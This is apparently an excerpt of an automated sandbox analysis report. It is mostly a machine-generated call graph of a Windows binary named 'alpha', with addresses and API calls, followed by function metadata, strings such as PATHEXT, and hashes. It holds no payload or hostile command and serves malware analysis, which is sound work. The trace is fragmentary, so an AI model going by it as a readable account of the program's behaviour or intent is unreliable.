18626->18628 18627->18632 18633 7ff7e1db3278 166 API calls 18627->18633 18629 7ff7e1db3278 166 API calls 18628->18629 18629->18632 18630 7ff7e1ddd672 longjmp 18631 7ff7e1dcc9da 18630->18631 18631->18449 18631->18451 18632->18630 18632->18631 18633->18632 18636 7ff7e1dbe60f 18635->18636 18693 7ff7e1dbef40 18636->18693 18638 7ff7e1dbe626 18639 7ff7e1dcccca longjmp 18638->18639 18640 7ff7e1dbe637 18638->18640 18639->18640 18641 7ff7e1dc3448 166 API calls 18640->18641 18642 7ff7e1dbe65f 18640->18642 18643 7ff7e1dcccfe 18641->18643 18642->18536 18643->18536 18645 7ff7e1dbd267 18644->18645 18650 7ff7e1dbd2d3 18644->18650 18646 7ff7e1dbd284 _wcsicmp 18645->18646 18651 7ff7e1dbd2a6 18645->18651 18647 7ff7e1dbd32b 18646->18647 18646->18651 18649 7ff7e1dbe600 473 API calls 18647->18649 18647->18651 18648 7ff7e1dbe600 473 API calls 18648->18650 18649->18647 18650->18645 18650->18648 18652 7ff7e1dbd305 18650->18652 18653 7ff7e1dbd316 18651->18653 18654 7ff7e1dbef40 472 API calls 18651->18654 18652->18653 18655 7ff7e1dbe600 473 API calls 18652->18655 18653->18540 18653->18545 18661 7ff7e1dbedf8 18654->18661 18655->18645 18656 7ff7e1dcd0a2 longjmp 18657 7ff7e1dcd0c5 18656->18657 18658 7ff7e1dc3448 166 API calls 18657->18658 18659 7ff7e1dcd0d4 18658->18659 18660 7ff7e1dbeece 18660->18653 18664 7ff7e1dbcd90 166 API calls 18660->18664 18661->18656 18661->18657 18662 7ff7e1dbee68 18661->18662 18669 7ff7e1dbeeb1 18661->18669 18663 7ff7e1dbef40 472 API calls 18662->18663 18663->18653 18665 7ff7e1dbeee7 18664->18665 18667 7ff7e1dbef31 18665->18667 18668 7ff7e1dbeeef 18665->18668 18666 7ff7e1dbe600 473 API calls 18666->18669 18671 7ff7e1dde91c 198 API calls 18667->18671 18670 7ff7e1dbe600 473 API calls 18668->18670 18669->18660 18669->18666 18672 7ff7e1dbeec2 18669->18672 18670->18653 18673 7ff7e1dbef36 18671->18673 18674 7ff7e1dbef40 472 API calls 18672->18674 18673->18656 18674->18660 18691 7ff7e1ddd419 18675->18691 18676 7ff7e1dccadf 18677 7ff7e1ddd576 18678 7ff7e1ddd592 18677->18678 18690 7ff7e1ddd555 18677->18690 18680 7ff7e1dc3448 166 API calls 18678->18680 18679 7ff7e1ddd5c4 18682 7ff7e1dc3448 166 API calls 18679->18682 18684 7ff7e1ddd5a5 18680->18684 18681 7ff7e1ddd541 18681->18678 18687 7ff7e1ddd546 18681->18687 18682->18676 18685 7ff7e1ddd5ba 18684->18685 18688 7ff7e1dc3448 166 API calls 18684->18688 18937 7ff7e1ddd36c 18685->18937 18686 7ff7e1dc3448 166 API calls 18686->18691 18687->18679 18687->18690 18688->18685 18944 7ff7e1ddd31c 18690->18944 18691->18676 18691->18677 18691->18678 18691->18679 18691->18681 18691->18686 18691->18690 18692 7ff7e1ddd3fc 166 API calls 18691->18692 18692->18691 18694 7ff7e1dbef71 18693->18694 18695 7ff7e1dcd1f3 18694->18695 18696 7ff7e1dbf130 18694->18696 18703 7ff7e1dbef87 18694->18703 18695->18638 18697 7ff7e1dc3448 166 API calls 18696->18697 18724 7ff7e1dbf046 18696->18724 18697->18724 18698 7ff7e1dbf433 18725 7ff7e1dbf8c0 EnterCriticalSection LeaveCriticalSection 18698->18725 18699 7ff7e1dbf438 18699->18724 18778 7ff7e1dbf860 18699->18778 18701 7ff7e1dbeff2 iswspace 18701->18703 18704 7ff7e1dbf01f wcschr 18701->18704 18703->18695 18703->18698 18703->18699 18703->18701 18703->18704 18703->18724 18704->18724 18705 7ff7e1dbf860 456 API calls 18705->18724 18706 7ff7e1dbf0c4 iswdigit 18706->18724 18707 7ff7e1dbf1b7 iswspace 18707->18706 18710 7ff7e1dbf1ce wcschr 18707->18710 18708 7ff7e1dbf1fc iswdigit 18708->18724 18709 7ff7e1dbf558 iswspace 18711 7ff7e1dbf6cd wcschr 18709->18711 18709->18724 18710->18706 18710->18708 18711->18724 18712 7ff7e1dbf8c0 456 API calls 18712->18724 18713 7ff7e1dcd1df 18714 7ff7e1db3278 166 API calls 18713->18714 18714->18695 18715 7ff7e1dbf860 456 API calls 18716 7ff7e1dbf632 iswspace 18715->18716 18717 7ff7e1dbf648 wcschr 18716->18717 18716->18724 18718 7ff7e1dbf65f iswdigit 18717->18718 18717->18724 18718->18724 18719 7ff7e1dbf32f iswspace 18721 7ff7e1dbf342 wcschr 18719->18721 18719->18724 18720 7ff7e1dbf2b8 iswdigit 18720->18724 18721->18720 18721->18724 18722 7ff7e1dbf3d2 iswspace 18723 7ff7e1dbf3e9 wcschr 18722->18723 18722->18724 18723->18724 18724->18638 18724->18705 18724->18706 18724->18707 18724->18708 18724->18709 18724->18712 18724->18713 18724->18715 18724->18719 18724->18720 18724->18722 18749 7ff7e1dbf934 18725->18749 18726 7ff7e1dbf94a EnterCriticalSection LeaveCriticalSection 18730 7ff7e1dbf994 _get_osfhandle 18726->18730 18726->18749 18727 7ff7e1dbfb46 18783 7ff7e1dbfc30 GetProcessHeap HeapAlloc 18727->18783 18728 7ff7e1db3240 166 API calls 18728->18749 18729 7ff7e1ddbfec 176 API calls 18729->18749 18732 7ff7e1dc0010 9 API calls 18730->18732 18732->18749 18734 7ff7e1dbfb52 18734->18699 18735 7ff7e1dcd3fa EnterCriticalSection LeaveCriticalSection longjmp 18735->18749 18736 7ff7e1dbfbe6 GetLastError 18754 7ff7e1dbfa42 18736->18754 18737 7ff7e1dcd388 _get_osfhandle 18739 7ff7e1dc0010 9 API calls 18737->18739 18738 7ff7e1dc01b8 6 API calls 18738->18749 18739->18749 18740 7ff7e1dcd3b6 GetLastError 18740->18749 18740->18754 18741 7ff7e1dde9b4 197 API calls 18742 7ff7e1dcd474 longjmp 18741->18742 18742->18749 18743 7ff7e1dcd2ac 18819 7ff7e1ddbf2c _get_osfhandle 18743->18819 18744 7ff7e1dcd2c7 EnterCriticalSection LeaveCriticalSection _get_osfhandle 18746 7ff7e1dd7f00 357 API calls 18744->18746 18746->18749 18747 7ff7e1dbfa80 wcschr 18747->18749 18748 7ff7e1dcd32e GetLastError 18748->18749 18749->18726 18749->18727 18749->18728 18749->18729 18749->18730 18749->18735 18749->18736 18749->18737 18749->18738 18749->18740 18749->18741 18749->18743 18749->18744 18749->18747 18749->18748 18750 7ff7e1dc3448 166 API calls 18749->18750 18751 7ff7e1dc3448 166 API calls 18749->18751 18753 7ff7e1dbfbd4 18749->18753 18749->18754 18755 7ff7e1dbfaf0 18749->18755 18818 7ff7e1ddf318 _get_osfhandle GetFileType 18749->18818 18752 7ff7e1dcd34d longjmp 18750->18752 18751->18749 18752->18749 18753->18727 18761 7ff7e1dbfbe1 18753->18761 18754->18699 18756 7ff7e1dc01b8 6 API calls 18755->18756 18757 7ff7e1dbfb0a 18756->18757 18757->18727 18760 7ff7e1dbfb0e _get_osfhandle SetFilePointer 18757->18760 18758 7ff7e1dcd4ee 18759 7ff7e1db3278 166 API calls 18758->18759 18765 7ff7e1dcd4fb 18759->18765 18760->18727 18766 7ff7e1dcd533 18760->18766 18761->18758 18762 7ff7e1dcd4dd 18761->18762 18763 7ff7e1ddbfec 176 API calls 18761->18763 18764 7ff7e1db3278 166 API calls 18762->18764 18767 7ff7e1dcd4c9 18763->18767 18768 7ff7e1dcd4e9 18764->18768 18769 7ff7e1dcd514 longjmp 18765->18769 18772 7ff7e1dc01b8 6 API calls 18765->18772 18766->18727 18774 7ff7e1dc34a0 166 API calls 18766->18774 18770 7ff7e1dc3448 166 API calls 18767->18770 18771 7ff7e1dde91c 198 API calls 18768->18771 18769->18754 18773 7ff7e1dcd4d1 18770->18773 18771->18758 18775 7ff7e1dcd50b 18772->18775 18776 7ff7e1dc3448 166 API calls 18773->18776 18774->18727 18775->18769 18824 7ff7e1ddf4a8 18775->18824 18776->18762 18781 7ff7e1dbf871 18778->18781 18779 7ff7e1dbf8c0 456 API calls 18782 7ff7e1dcd203 18779->18782 18780 7ff7e1dbf881 18780->18724 18781->18779 18781->18780 18784 7ff7e1dbfc6a 18783->18784 18785 7ff7e1dcd55c 18783->18785 18786 7ff7e1dcd571 memset longjmp 18784->18786 18801 7ff7e1dbfca2 18784->18801 18787 7ff7e1db3278 166 API calls 18785->18787 18789 7ff7e1dbfce7 18786->18789 18788 7ff7e1dcd566 18787->18788 18788->18786 18789->18734 18790 7ff7e1dbfd73 18791 7ff7e1dbfd99 18790->18791 18792 7ff7e1dcd638 18790->18792 18793 7ff7e1dbff70 2 API calls 18791->18793 18794 7ff7e1db3278 166 API calls 18792->18794 18796 7ff7e1dbfda1 18793->18796 18795 7ff7e1dcd64c 18794->18795 18797 7ff7e1dbff70 2 API calls 18795->18797 18796->18734 18798 7ff7e1dcd654 longjmp 18797->18798 18802 7ff7e1dbff4f 18798->18802 18801->18789 18801->18790 18801->18801 18801->18802 18803 7ff7e1dcd609 18801->18803 18809 7ff7e1dcd5b5 memmove 18801->18809 18832 7ff7e1dc18d4 18801->18832 18906 7ff7e1dbd840 GetProcessHeap HeapAlloc 18801->18906 18804 7ff7e1dcd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18802->18804 18806 7ff7e1dc0167 MultiByteToWideChar 18802->18806 18807 7ff7e1dc0131 SetFilePointer 18802->18807 18805 7ff7e1db3278 166 API calls 18803->18805 18812 7ff7e1dc0190 18804->18812 18810 7ff7e1dcd615 18805->18810 18806->18812 18807->18802 18811 7ff7e1db3278 166 API calls 18809->18811 18813 7ff7e1dbff70 2 API calls 18810->18813 18814 7ff7e1dcd5e6 18811->18814 18812->18734 18815 7ff7e1dcd61f longjmp 18813->18815 18816 7ff7e1dbff70 2 API calls 18814->18816 18815->18792 18817 7ff7e1dcd5f0 longjmp 18816->18817 18817->18803 18818->18749 18820 7ff7e1dd8450 367 API calls 18819->18820 18822 7ff7e1ddbf59 18820->18822 18821 7ff7e1ddbf6b GetLastError 18822->18821 18823 7ff7e1ddbf62 18822->18823 18823->18754 18825 7ff7e1ddf4c1 GetStdHandle 18824->18825 18826 7ff7e1dd8450 367 API calls 18825->18826 18827 7ff7e1ddf4ea 18826->18827 18828 7ff7e1ddf4ee wcschr 18827->18828 18829 7ff7e1ddf509 18827->18829 18828->18825 18828->18829 18830 7ff7e1dc8f80 7 API calls 18829->18830 18831 7ff7e1ddf519 18830->18831 18831->18769 18833 7ff7e1dc1935 18832->18833 18834 7ff7e1dc193b 18832->18834 18833->18834 18835 7ff7e1dc19a1 18833->18835 18836 7ff7e1dc195a 18834->18836 18837 7ff7e1dc1946 wcsrchr 18834->18837 18839 7ff7e1dc2e44 memset malloc 18835->18839 18879 7ff7e1dcdbda 18835->18879 18838 7ff7e1dc8f80 7 API calls 18836->18838 18837->18836 18841 7ff7e1dc1978 18838->18841 18859 7ff7e1dc19cf 18839->18859 18840 7ff7e1dcdbdf longjmp 18842 7ff7e1dcdbf3 ??_V@YAXPEAX 18840->18842 18841->18801 18843 7ff7e1dcdbff ??_V@YAXPEAX 18842->18843 18843->18836 18844 7ff7e1dc1a21 18847 7ff7e1dcdc3c wcschr 18844->18847 18848 7ff7e1dc1a3c wcsrchr 18844->18848 18856 7ff7e1dc1dfe 18844->18856 18845 7ff7e1dc19f3 towlower wcsrchr 18845->18844 18846 7ff7e1dc1af6 wcsrchr 18845->18846 18852 7ff7e1dc1b11 towlower 18846->18852 18846->18856 18850 7ff7e1dcdcd2 18847->18850 18851 7ff7e1dcdc5d 18847->18851 18849 7ff7e1dc1a54 wcsrchr 18848->18849 18848->18856 18849->18850 18853 7ff7e1dc1a71 18849->18853 18850->18843 18855 7ff7e1db3278 166 API calls 18850->18855 18854 7ff7e1dbcd90 166 API calls 18851->18854 18852->18856 18852->18859 18862 7ff7e1dbb900 166 API calls 18853->18862 18869 7ff7e1dc1a95 18853->18869 18865 7ff7e1dcdc75 18854->18865 18858 7ff7e1dcdcef longjmp 18855->18858 18856->18847 18856->18850 18857 7ff7e1dc1d74 18857->18836 18866 7ff7e1dc1d7d ??_V@YAXPEAX 18857->18866 18861 7ff7e1dcdd03 18858->18861 18859->18844 18859->18845 18859->18856 18859->18879 18860 7ff7e1dcdccd 18860->18843 18867 7ff7e1dcdd3b 18861->18867 18868 7ff7e1dcdd0c SearchPathW 18861->18868 18862->18869 18863 7ff7e1dc1acf 18870 7ff7e1dbb900 166 API calls 18863->18870 18864 7ff7e1dc1b64 18864->18861 18872 7ff7e1dc1b76 GetFullPathNameW 18864->18872 18871 7ff7e1dc3a90 170 API calls 18865->18871 18865->18879 18866->18836 18876 7ff7e1dcdd5c wcsrchr 18867->18876 18868->18867 18869->18857 18869->18863 18869->18864 18869->18879 18873 7ff7e1dc1ad7 ??_V@YAXPEAX 18870->18873 18874 7ff7e1dcdc98 18871->18874 18875 7ff7e1dc2978 13 API calls 18872->18875 18873->18836 18877 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18874->18877 18878 7ff7e1dc1ba7 wcsrchr 18875->18878 18881 7ff7e1dcdd73 18876->18881 18877->18879 18878->18876 18880 7ff7e1dc1bc9 18878->18880 18879->18836 18879->18840 18879->18860 18880->18857 18882 7ff7e1dc1bda memset 18880->18882 18883 7ff7e1dcdd8c 18881->18883 18884 7ff7e1dcdd78 longjmp 18881->18884 18885 7ff7e1dbca40 17 API calls 18882->18885 18883->18842 18883->18843 18884->18883 18886 7ff7e1dc1c23 18885->18886 18886->18881 18887 7ff7e1dcdda8 GetFileAttributesExW 18886->18887 18899 7ff7e1dc1c4f 18886->18899 18888 7ff7e1dcdfd0 18887->18888 18890 7ff7e1dcddc5 18887->18890 18888->18801 18889 7ff7e1dbb900 166 API calls 18891 7ff7e1dc1d52 18889->18891 18892 7ff7e1dcdf34 18890->18892 18896 7ff7e1dd85d0 8 API calls 18890->18896 18891->18857 18895 7ff7e1dc1d68 ??_V@YAXPEAX 18891->18895 18897 7ff7e1dcdf4d 18892->18897 18892->18899 18893 7ff7e1dc1d09 18893->18889 18894 7ff7e1dce035 18893->18894 18895->18857 18898 7ff7e1dcde3f 18896->18898 18900 7ff7e1de08ec 9 API calls 18897->18900 18902 7ff7e1db6ee4 166 API calls 18898->18902 18899->18856 18899->18893 18901 7ff7e1dc1cd8 wcsrchr 18899->18901 18900->18888 18901->18894 18903 7ff7e1dc1cf5 18901->18903 18904 7ff7e1dcdeb6 18902->18904 18903->18856 18903->18893 18905 7ff7e1dc3140 166 API calls 18904->18905 18905->18892 18907 7ff7e1dbd8b5 18906->18907 18908 7ff7e1dbdefa 18906->18908 18910 7ff7e1dbdf04 18907->18910 18912 7ff7e1dbd8e5 18907->18912 18909 7ff7e1db3278 166 API calls 18908->18909 18909->18910 18911 7ff7e1dbdf15 longjmp 18910->18911 18936 7ff7e1dbda67 18910->18936 18911->18936 18915 7ff7e1dbd94d GetProcessHeap HeapAlloc 18912->18915 18916 7ff7e1dbdeb6 18912->18916 18912->18936 18913 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18914 7ff7e1dbdf34 18913->18914 18917 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18914->18917 18915->18916 18926 7ff7e1dbd97c 18915->18926 18918 7ff7e1db3278 166 API calls 18916->18918 18919 7ff7e1dbdf3c 18917->18919 18920 7ff7e1dbdec5 18918->18920 18919->18801 18921 7ff7e1dbdeda longjmp 18920->18921 18920->18936 18921->18936 18922 7ff7e1dc081c 166 API calls 18922->18926 18923 7ff7e1dbdbce wcstol 18923->18926 18924 7ff7e1dbdaa9 18925 7ff7e1dbde4a 18924->18925 18931 7ff7e1dbdaf3 18924->18931 18924->18936 18927 7ff7e1db3278 166 API calls 18925->18927 18925->18936 18926->18920 18926->18922 18926->18923 18926->18924 18926->18926 18928 7ff7e1dbdc43 18926->18928 18926->18936 18929 7ff7e1dbde69 longjmp 18927->18929 18930 7ff7e1dbdc52 wcstol 18928->18930 18928->18936 18929->18936 18930->18936 18932 7ff7e1dbdb80 _wcsnicmp 18931->18932 18931->18936 18932->18931 18933 7ff7e1dbdd0f 18932->18933 18934 7ff7e1dbdd30 memmove 18933->18934 18935 7ff7e1dbde97 memmove 18933->18935 18934->18936 18935->18916 18936->18913 18938 7ff7e1ddd381 18937->18938 18939 7ff7e1ddd3d8 18937->18939 18940 7ff7e1dc34a0 166 API calls 18938->18940 18942 7ff7e1ddd390 18940->18942 18941 7ff7e1dc3448 166 API calls 18941->18942 18942->18939 18942->18941 18943 7ff7e1dc34a0 166 API calls 18942->18943 18943->18942 18945 7ff7e1dc3448 166 API calls 18944->18945 18946 7ff7e1ddd33b 18945->18946 18947 7ff7e1ddd36c 166 API calls 18946->18947 18948 7ff7e1ddd343 18947->18948 18949 7ff7e1ddd3fc 166 API calls 18948->18949 18966 7ff7e1ddd34e 18949->18966 18950 7ff7e1ddd5c2 18950->18676 18951 7ff7e1ddd576 18952 7ff7e1ddd592 18951->18952 18964 7ff7e1ddd555 18951->18964 18954 7ff7e1dc3448 166 API calls 18952->18954 18953 7ff7e1ddd5c4 18956 7ff7e1dc3448 166 API calls 18953->18956 18958 7ff7e1ddd5a5 18954->18958 18955 7ff7e1ddd541 18955->18952 18961 7ff7e1ddd546 18955->18961 18956->18950 18957 7ff7e1ddd31c 166 API calls 18957->18950 18959 7ff7e1ddd5ba 18958->18959 18962 7ff7e1dc3448 166 API calls 18958->18962 18963 7ff7e1ddd36c 166 API calls 18959->18963 18960 7ff7e1dc3448 166 API calls 18960->18966 18961->18953 18961->18964 18962->18959 18963->18950 18964->18957 18965 7ff7e1ddd3fc 166 API calls 18965->18966 18966->18950 18966->18951 18966->18952 18966->18953 18966->18955 18966->18960 18966->18964 18966->18965 18969 7ff7e1ddbfb5 18968->18969 18970 7ff7e1ddbf99 18968->18970 18969->18552 18969->18565 18969->18570 18971 7ff7e1dc9324 malloc 18970->18971 18971->18969 18979 7ff7e1db58d4 RegOpenKeyExW 18972->18979 18975 7ff7e1dc33f0 _vsnwprintf 18976 7ff7e1db58c2 18975->18976 18976->18570 18977->18570 18980 7ff7e1db5913 RegQueryValueExW RegCloseKey 18979->18980 18981 7ff7e1db588c 18979->18981 18980->18981 18981->18975 18985 7ff7e1dd773c 18982->18985 18983 7ff7e1dd777d 18983->18605 18984 7ff7e1dc3448 166 API calls 18984->18985 18985->18983 18985->18984 18987 7ff7e1dd778c 166 API calls 18986->18987 18988 7ff7e1dd76fb 18987->18988 18989 7ff7e1dd771c 18988->18989 18990 7ff7e1dc3448 166 API calls 18988->18990 18989->18605 18991 7ff7e1dd7711 18990->18991 18992 7ff7e1dd778c 166 API calls 18991->18992 18992->18989 18994 7ff7e1dbc486 18993->18994 18995 7ff7e1dbc4c9 18993->18995 18996 7ff7e1dbc48e wcschr 18994->18996 19000 7ff7e1dbc161 18994->19000 18999 7ff7e1dbff70 2 API calls 18995->18999 18995->19000 18997 7ff7e1dbc4ef 18996->18997 18996->19000 18998 7ff7e1dbcd90 166 API calls 18997->18998 19006 7ff7e1dbc4f9 18998->19006 18999->19000 19000->18117 19000->18125 19001 7ff7e1dbc5bd 19002 7ff7e1dbc541 19001->19002 19004 7ff7e1dbb6b0 170 API calls 19001->19004 19002->19000 19003 7ff7e1dbff70 2 API calls 19002->19003 19003->19000 19004->19002 19005 7ff7e1dbd840 178 API calls 19005->19006 19006->19000 19006->19001 19006->19002 19006->19005 19007->18140 19009 7ff7e1dc3bfe 19008->19009 19011 7ff7e1dc3bcf 19008->19011 19009->18206 19010 7ff7e1dc3bdc wcschr 19010->19009 19010->19011 19011->19009 19011->19010 19013 7ff7e1dc8f80 7 API calls 19012->19013 19014 7ff7e1dc296b 19013->19014 19014->18206 19016 7ff7e1dc2f2a 19015->19016 19017 7ff7e1dc2f97 19015->19017 19018 7ff7e1dc823c 10 API calls 19016->19018 19017->19016 19019 7ff7e1dc2f9c wcschr 19017->19019 19021 7ff7e1dc2f56 19018->19021 19020 7ff7e1dc2fb6 wcschr 19019->19020 19027 7ff7e1dc2f5a 19019->19027 19020->19016 19020->19027 19022 7ff7e1dc3a0c 2 API calls 19021->19022 19021->19027 19023 7ff7e1dc2fe0 19022->19023 19025 7ff7e1dc2fe9 wcsrchr 19023->19025 19023->19027 19024 7ff7e1dc8f80 7 API calls 19026 7ff7e1dc2f83 19024->19026 19025->19027 19026->18206 19027->19024 19028 7ff7e1dce4ec 19027->19028 19030 7ff7e1dd4621 19029->19030 19031 7ff7e1db72de 19029->19031 19035 7ff7e1dd447b longjmp 19030->19035 19038 7ff7e1dd4639 19030->19038 19052 7ff7e1dd47e0 19030->19052 19055 7ff7e1dd475e 19030->19055 19032 7ff7e1db72eb 19031->19032 19036 7ff7e1dd4530 19031->19036 19037 7ff7e1dd4467 19031->19037 19090 7ff7e1db7348 19032->19090 19034 7ff7e1db7348 168 API calls 19076 7ff7e1dd4524 19034->19076 19039 7ff7e1dd4492 19035->19039 19041 7ff7e1db7348 168 API calls 19036->19041 19037->19032 19037->19039 19050 7ff7e1dd4475 19037->19050 19044 7ff7e1dd4695 19038->19044 19045 7ff7e1dd463e 19038->19045 19040 7ff7e1db7348 168 API calls 19039->19040 19062 7ff7e1dd44a8 19040->19062 19064 7ff7e1dd4549 19041->19064 19042 7ff7e1db7315 19105 7ff7e1db73d4 19042->19105 19049 7ff7e1db73d4 168 API calls 19044->19049 19045->19035 19053 7ff7e1dd4654 19045->19053 19046 7ff7e1db7348 168 API calls 19046->19042 19047 7ff7e1db72b0 168 API calls 19056 7ff7e1dd480e 19047->19056 19067 7ff7e1dd469a 19049->19067 19050->19035 19050->19044 19051 7ff7e1db7348 168 API calls 19051->19052 19052->19034 19065 7ff7e1db7348 168 API calls 19053->19065 19054 7ff7e1dd45b2 19058 7ff7e1db7348 168 API calls 19054->19058 19055->19051 19056->18252 19057 7ff7e1db7323 19057->18252 19061 7ff7e1dd45c7 19058->19061 19059 7ff7e1dd455e 19059->19054 19068 7ff7e1db7348 168 API calls 19059->19068 19060 7ff7e1dd46e1 19066 7ff7e1db72b0 168 API calls 19060->19066 19069 7ff7e1db7348 168 API calls 19061->19069 19063 7ff7e1dd44e2 19062->19063 19070 7ff7e1db7348 168 API calls 19062->19070 19071 7ff7e1db72b0 168 API calls 19063->19071 19064->19054 19064->19059 19077 7ff7e1db7348 168 API calls 19064->19077 19065->19057 19072 7ff7e1dd4738 19066->19072 19067->19060 19080 7ff7e1dd46c7 19067->19080 19081 7ff7e1dd46ea 19067->19081 19068->19054 19073 7ff7e1dd45db 19069->19073 19070->19063 19074 7ff7e1dd44f1 19071->19074 19075 7ff7e1db7348 168 API calls 19072->19075 19078 7ff7e1db7348 168 API calls 19073->19078 19079 7ff7e1db72b0 168 API calls 19074->19079 19075->19076 19076->19047 19076->19057 19077->19059 19082 7ff7e1dd45ec 19078->19082 19083 7ff7e1dd4503 19079->19083 19080->19060 19086 7ff7e1db7348 168 API calls 19080->19086 19084 7ff7e1db7348 168 API calls 19081->19084 19085 7ff7e1db7348 168 API calls 19082->19085 19083->19057 19088 7ff7e1db7348 168 API calls 19083->19088 19084->19060 19087 7ff7e1dd4600 19085->19087 19086->19060 19089 7ff7e1db7348 168 API calls 19087->19089 19088->19076 19089->19076 19092 7ff7e1db735d 19090->19092 19091 7ff7e1db3278 166 API calls 19093 7ff7e1dd4820 longjmp 19091->19093 19092->19091 19092->19092 19094 7ff7e1dd4838 19092->19094 19100 7ff7e1db73ab 19092->19100 19093->19094 19095 7ff7e1db3278 166 API calls 19094->19095 19096 7ff7e1dd4844 longjmp 19095->19096 19097 7ff7e1dd485a 19096->19097 19098 7ff7e1db7348 166 API calls 19097->19098 19099 7ff7e1dd487b 19098->19099 19101 7ff7e1db7348 166 API calls 19099->19101 19102 7ff7e1dd48ad 19101->19102 19103 7ff7e1db7348 166 API calls 19102->19103 19104 7ff7e1db72ff 19103->19104 19104->19042 19104->19046 19106 7ff7e1db7401 19105->19106 19107 7ff7e1dd485a 19105->19107 19106->19057 19108 7ff7e1db7348 168 API calls 19107->19108 19109 7ff7e1dd487b 19108->19109 19110 7ff7e1db7348 168 API calls 19109->19110 19111 7ff7e1dd48ad 19110->19111 19112 7ff7e1db7348 168 API calls 19111->19112 19113 7ff7e1dd48be 19112->19113 19113->19057 16742 7ff7e1dc8d80 16743 7ff7e1dc8da4 16742->16743 16744 7ff7e1dc8db6 16743->16744 16745 7ff7e1dc8dbf Sleep 16743->16745 16746 7ff7e1dc8ddb _amsg_exit 16744->16746 16752 7ff7e1dc8de7 16744->16752 16745->16743 16746->16752 16747 7ff7e1dc8e56 _initterm 16749 7ff7e1dc8e73 _IsNonwritableInCurrentImage 16747->16749 16748 7ff7e1dc8e3c 16756 7ff7e1dc37d8 GetCurrentThreadId OpenThread 16749->16756 16752->16747 16752->16748 16752->16749 16789 7ff7e1dc04f4 16756->16789 16758 7ff7e1dc3839 HeapSetInformation RegOpenKeyExW 16759 7ff7e1dce9f8 RegQueryValueExW RegCloseKey 16758->16759 16760 7ff7e1dc388d 16758->16760 16762 7ff7e1dcea41 GetThreadLocale 16759->16762 16761 7ff7e1dc5920 VirtualQuery VirtualQuery 16760->16761 16763 7ff7e1dc38ab GetConsoleOutputCP GetCPInfo 16761->16763 16776 7ff7e1dc3919 16762->16776 16763->16762 16764 7ff7e1dc38f1 memset 16763->16764 16764->16776 16765 7ff7e1dc4d5c 391 API calls 16765->16776 16766 7ff7e1db3240 166 API calls 16766->16776 16767 7ff7e1dc3948 _setjmp 16767->16776 16768 7ff7e1dceb27 _setjmp 16768->16776 16769 7ff7e1dd8530 370 API calls 16769->16776 16770 7ff7e1dc01b8 6 API calls 16770->16776 16771 7ff7e1dc4c1c 166 API calls 16771->16776 16772 7ff7e1dbdf60 481 API calls 16772->16776 16773 7ff7e1dceb71 _setmode 16773->16776 16774 7ff7e1dc0580 12 API calls 16777 7ff7e1dc398b GetConsoleOutputCP GetCPInfo 16774->16777 16775 7ff7e1dc86f0 182 API calls 16775->16776 16776->16759 16776->16765 16776->16766 16776->16767 16776->16768 16776->16769 16776->16770 16776->16771 16776->16772 16776->16773 16776->16774 16776->16775 16778 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 16776->16778 16780 7ff7e1dbbe00 647 API calls 16776->16780 16781 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 16776->16781 16779 7ff7e1dc04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16777->16779 16778->16776 16779->16776 16780->16776 16782 7ff7e1dcebbe GetConsoleOutputCP GetCPInfo 16781->16782 16783 7ff7e1dc04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16782->16783 16784 7ff7e1dcebe6 16783->16784 16785 7ff7e1dbbe00 647 API calls 16784->16785 16786 7ff7e1dc0580 12 API calls 16784->16786 16785->16784 16787 7ff7e1dcebfc GetConsoleOutputCP GetCPInfo 16786->16787 16788 7ff7e1dc04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16787->16788 16788->16776 16790 7ff7e1dc0504 16789->16790 16791 7ff7e1dc051e GetModuleHandleW 16790->16791 16792 7ff7e1dc054d GetProcAddress 16790->16792 16793 7ff7e1dc056c SetThreadLocale 16790->16793 16791->16790 16792->16790

                                                      Executed Functions

                                                      Function 00007FF7E1DC0A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                      • API String ID: 3305344409-4288247545
                                                      • Opcode ID: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
                                                      • Instruction ID: 792d6073e1623914c260ae244dc1910add6848bb42fc3424631bdf3e8537c91b
                                                      • Opcode Fuzzy Hash: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
                                                      • Instruction Fuzzy Hash: C342F665A08A8285EB14EB1198023B9E7A1FF85794FC44A32DD1E877D4DFBCE144C3A2
                                                      Function 00007FF7E1DBAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
